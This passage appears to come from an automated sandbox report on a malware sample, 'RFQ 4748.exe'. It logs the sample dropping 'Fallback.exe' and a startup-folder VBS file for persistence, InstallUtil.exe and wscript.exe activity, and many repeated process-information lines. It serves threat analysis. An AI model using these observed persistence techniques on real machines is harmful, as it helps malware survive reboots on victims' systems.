                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA34B3 push es; iretd 5_2_06DA34B6
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA5431 push ebp; iretd 5_2_06DA543E
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAC540 push eax; iretd 5_2_06DAC54E
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DACD0A push ecx; iretd 5_2_06DACD16
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15ED5 push es; iretd 5_2_06F15F18
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15F29 push es; iretd 5_2_06F15F58
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15A8A push es; ret 5_2_06F15A8C
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F15B6D push es; ret 5_2_06F15B88
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F159EE push es; iretd 5_2_06F159F0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07228379 push esp; iretd 5_2_0722837A
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_072297A9 push esp; iretd 5_2_072297AA
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07227FD1 push ecx; iretd 5_2_07227FD2
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07229A04 push esp; iretd 5_2_07229A05
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_07225A46 push esp; iretd 5_2_07225A47
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile created: C:\Users\user\AppData\Roaming\Fallback.exeJump to dropped file

                  Boot Survival

                  barindex
                  Drops VBS files to the startup folder
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbsJump to dropped file
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fallback.vbsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
